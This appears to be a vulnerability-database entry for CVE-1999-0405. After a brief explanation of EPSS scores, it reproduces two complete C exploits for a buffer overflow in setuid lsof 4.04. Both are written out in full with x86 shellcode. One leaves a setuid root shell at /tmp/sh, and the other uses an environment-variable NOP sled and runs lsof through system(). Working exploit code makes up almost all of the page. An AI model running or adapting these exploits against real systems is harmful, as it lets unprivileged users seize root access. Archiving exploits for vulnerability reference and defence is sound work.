CVE-1999-0405 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

// source: https://www.securityfocus.com/bid/496/info // // Lsof is an open file management utility included with many linux distributions. When run setuid root or setgid kmem, it is subject to a buffer overflow that can lead to regular users gaining root priveleges. // /* * Sekure SDI (Brazilian Information Security Team) * lsof local exploit for linux * by c0nd0r <[email protected]> * * Security problem found by HERT. (www.hert.org) * * -> This little tool will bring you a suid or sgid shell owned by lsof * user (root|kmem usually) at /tmp directory (/tmp/sh). * * ----------------------------------------------------------------------- * Code explanation: We've used a unsual technique here. * The buffer allocated was too small for the standard expl, so we did a * little trick, by overflowing with 'A' till reaching the ret address and * then we've filled with NOP and the shellcode just after the modified * ret address. So we have a different exploit architeture: * [garbage][eip modified][lotsa NOP's][shellcode] * That's why we need a bigger offset. * ----------------------------------------------------------------------- * * usage ( needa have a little brain): * ./SDI-lsof <offset> (between 373-505) * * 4 phun - http://www.sekure.org * Thanks to jamez, dumped, bishop, bahamas, slide, falcon, vader * and guys at #uground (irc.brasnet.org network) * */ /* change the lsof path if it's needed */ #define PATH "/usr/bin/lsof" char shellcode[] = "\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36" "\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88" "\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3" "\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8" "\x40\xcd\x80\xe8\xca\xff\xff\xff/bin/sh -c cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh"; unsigned long getsp ( void) { __asm__("mov %esp,%eax"); } main ( int argc, char *argv[0]) { char b00m[220]; long addr; int x, y, offset=380; if (argc > 1) offset = atoi(argv[1]); for (x = 0; x < 16; x++) b00m[x] = 'A'; addr = getsp() + offset; printf ( "SDI-lsof exploiting at 0x%x\n", addr); b00m[x++] = addr & 0x000000ff; b00m[x++] = (addr & 0x0000ff00) >> 8; b00m[x++] = (addr & 0x00ff0000) >> 16; b00m[x++] = (addr & 0xff000000) >> 24; for ( ; x < 100; x++) b00m[x] = 0x90; for (y = 0; y < strlen(shellcode); y++, x++) b00m[x] = shellcode[y]; b00m[strlen(b00m)] = '\0'; printf ( "\nFind a suid shell at /tmp/sh...\n\n"); execl ( PATH, PATH, "-u", b00m, (char *)0); perror ( "execl") ; }

// source: https://www.securityfocus.com/bid/496/info Lsof is an open file management utility included with many linux distributions. When run setuid root or setgid kmem, it is subject to a buffer overflow that can lead to regular users gaining root priveleges. /* http://www.hackersnetwork.net! */ /* * Xploit for lsof 4.0.4 by Zhodiac <[email protected]> * Based on Aleph's article in phrack49 */ #include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 32 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_esp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr, *egg; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i, eggsize=DEFAULT_EGG_SIZE; char comando[512]; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) eggsize = atoi(argv[3]); printf("\nXploit for lsof 4.04 by zhodiac <[email protected]>\n\n"); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(egg = malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_esp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg,"EGG=",4); putenv(egg); snprintf(comando,511,"lsof -u %s",buff); system(comando); }